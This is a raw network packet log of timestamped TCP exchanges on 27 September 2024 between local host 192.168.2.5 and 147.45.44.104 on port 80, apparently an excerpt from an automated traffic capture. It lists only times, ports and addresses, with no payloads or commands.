Sep 27, 2024 00:15:16.119951963 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119980097 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120073080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120085955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120096922 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120115042 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120127916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120163918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120176077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120187998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120199919 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120228052 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120254040 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120368004 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120378971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120389938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120400906 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120413065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120424032 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120424032 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120435953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120448112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120452881 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120460987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120469093 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120505095 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120578051 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120656013 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.120960951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120975971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.120990992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121031046 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121093035 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121107101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121121883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121148109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121164083 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121181965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121197939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121212959 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121227980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121238947 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121274948 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121368885 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121383905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121397972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121412992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121428013 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121428967 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121443987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121455908 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121460915 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121474981 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121489048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121491909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121515989 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.121624947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121637106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.121660948 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122178078 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122194052 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122209072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122224092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122237921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122237921 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122252941 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122268915 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122268915 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122283936 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122312069 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122318029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122333050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122356892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122371912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122379065 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122387886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122401953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122414112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122417927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122433901 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122446060 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122451067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122477055 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122590065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122606039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122621059 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122634888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.122648001 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.122708082 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123095989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123111963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123138905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123150110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123155117 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123171091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123184919 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123197079 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123220921 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123266935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123281956 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123298883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123306036 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123315096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123330116 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123333931 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123346090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123404980 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123450994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123472929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123491049 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123889923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123904943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123919964 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123933077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123936892 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123949051 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123960972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123964071 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.123974085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123985052 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.123989105 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124000072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124031067 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124058008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124072075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124073029 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124083996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124099970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124115944 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124133110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124151945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124164104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124175072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124175072 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124175072 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124188900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124192953 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124203920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124216080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124231100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124248981 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124249935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.124270916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.124313116 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125452995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125466108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125478983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125518084 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125520945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125534058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125545979 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125552893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125560045 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125617981 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125686884 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125700951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125713110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125730038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125766993 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125878096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125889063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125900984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125911951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125927925 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125938892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125941038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125957012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.125962019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.125971079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126003027 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126029015 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126099110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126110077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126121998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126133919 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126144886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126156092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126162052 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126168966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126180887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126188993 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126193047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126214981 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126226902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126228094 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126256943 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126451015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126463890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126476049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126487970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126498938 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126498938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126513004 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126523018 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126527071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126539946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126552105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126554012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126564026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126569033 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126576900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126590014 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126590014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126615047 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126849890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126862049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126872063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126883984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126892090 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126895905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126918077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126930952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126941919 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126941919 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126944065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126959085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126970053 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126981020 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.126981020 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126987934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.126998901 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127008915 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127010107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127023935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127032995 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127037048 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127051115 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127067089 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127101898 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127317905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127331018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127342939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127362013 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127371073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127374887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127397060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127404928 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127410889 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127465963 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127568960 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127580881 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127592087 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127598047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127610922 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127621889 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127625942 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127636909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127649069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127662897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127665043 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127722979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127722979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127832890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127846003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127856970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127868891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127878904 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127881050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127892971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127909899 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.127913952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.127962112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128138065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128151894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128163099 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128174067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128185987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128200054 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128204107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128216982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128222942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128228903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128240108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128242016 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128252983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128264904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128271103 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128278017 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128283978 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128290892 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128294945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128302097 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128309011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128326893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128386021 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128386021 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128386021 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128645897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128658056 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128669024 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128680944 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128693104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128701925 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128707886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128720045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128730059 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128731012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128743887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128756046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128768921 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128772974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128786087 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128801107 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128923893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128937960 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128953934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128966093 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128981113 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.128984928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.128998041 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129009008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129021883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129101992 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129280090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129292965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129303932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129313946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129326105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129328012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129338980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129347086 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129348993 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129360914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129374027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129389048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129405022 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129477978 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129492044 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129502058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129513979 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129525900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129528999 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129539967 CEST	80	49711	147.45.44.104	192.168.2.5
